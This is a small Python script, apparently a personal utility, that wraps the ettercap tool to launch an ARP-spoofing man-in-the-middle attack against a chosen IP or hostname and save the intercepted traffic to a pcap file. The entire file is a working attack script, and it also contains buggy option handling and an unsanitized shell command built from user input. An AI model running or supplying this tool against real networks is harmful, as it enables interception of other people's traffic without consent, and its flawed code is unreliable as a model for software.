#!/usr/local/bin/python

# requires ettercap ('brew install ettercap')

# usage:
#   'mitm {ip}'
# or
#   'mitm -h {host}'

from __future__ import print_function

import sys
import socket
from getopt import getopt
from subprocess import Popen, PIPE, STDOUT

if len(sys.argv) < 2:
    print ("Usage: mitm [IP] \n\t -h [HOSTNAME] (replaces IP) \n\t -p [PORT]")
    exit(0)

(options, addr) = getopt(sys.argv[1:], "h:p:")

port = ''
ip = addr[0]

for option in options:
    if option[0] is 'p':
        port = option[1]
    if option[0] is 'h':
        ip = socket.gethostbyname(option[1])

print ("MITM attacking {}. Stand by...".format(ip))
p = Popen('sudo ettercap -i en1 -T -w /Users/bjacobel/Desktop/ettercap.pcap -M ARP /{}/ /{}/ output:'.format(ip,port), stdout = PIPE, stderr = STDOUT, shell = True)

for line in iter(p.stdout.readline, ""):
    line = p.stdout.readline()
    print(line, end="")
